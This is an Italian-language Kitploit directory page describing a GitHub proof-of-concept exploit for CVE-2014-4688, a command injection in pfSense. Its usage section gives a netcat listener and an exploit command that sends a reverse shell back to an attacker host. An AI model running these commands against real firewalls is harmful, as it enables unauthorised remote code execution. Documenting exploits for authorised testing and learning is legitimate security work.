Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/jaydenblair/cve-2014-4688-pfsense
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e Formazione
GitHubjaydenblair/cve-2014-4688-pfsense

CVE-2014-4688-pfsense

Exploit proof-of-concept modificato per CVE-2014-4688, una vulnerabilità di command injection in pfSense status_rrd_graph_img.php, che consente l'esecuzione remota di codice autenticata con gestione SSL.

Vedi Repository
16 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2014-4688 – Iniezione di comandi in pfSense

Prova di concetto modificata di Exploit-DB per CVE-2014-4688 (iniezione di comandi in pfSense status_rrd_graph_img.php)

Panoramica

Questo repository contiene una versione modificata della prova di concetto originale di Exploit-DB per CVE-2014-4688, che interessa le versioni di pfSense ≤ 2.1.3.

La vulnerabilità è presente nel componente status_rrd_graph_img.php e consente agli utenti autenticati di eseguire comandi di sistema arbitrari a causa di una sanificazione impropria dell'input del parametro database.

  • Autore dell'exploit originale: absolomb
  • Fonte originale: Exploit-DB

Riepilogo della vulnerabilità

  • CVE: CVE-2014-4688
  • Versioni interessate: pfSense ≤ 2.1.3
  • Componente: status_rrd_graph_img.php
  • Impatto: Esecuzione di comandi da parte di utente autenticato

Un utente autenticato può iniettare comandi shell arbitrari tramite input appositamente predisposti inviati all'endpoint vulnerabile.

Modifiche

  • Aggiunta la gestione SSL limitata alla sessione per ambienti con certificati autofirmati
  • Soppressi gli avvisi di richieste non sicure di urllib3

Utilizzo

Avvia un listener:

root@kitploit:~
nc -lvnp <LPORT>

Prova di concetto:

root@kitploit:~
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>

Esempio

root@kitploit:~
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password

Disclaimer

Questo repository è fornito esclusivamente per ricerca sulla sicurezza autorizzata, istruzione e test controllati. L'utilizzo non autorizzato contro sistemi senza esplicito permesso è illegale e non etico.

Scarica lo strumento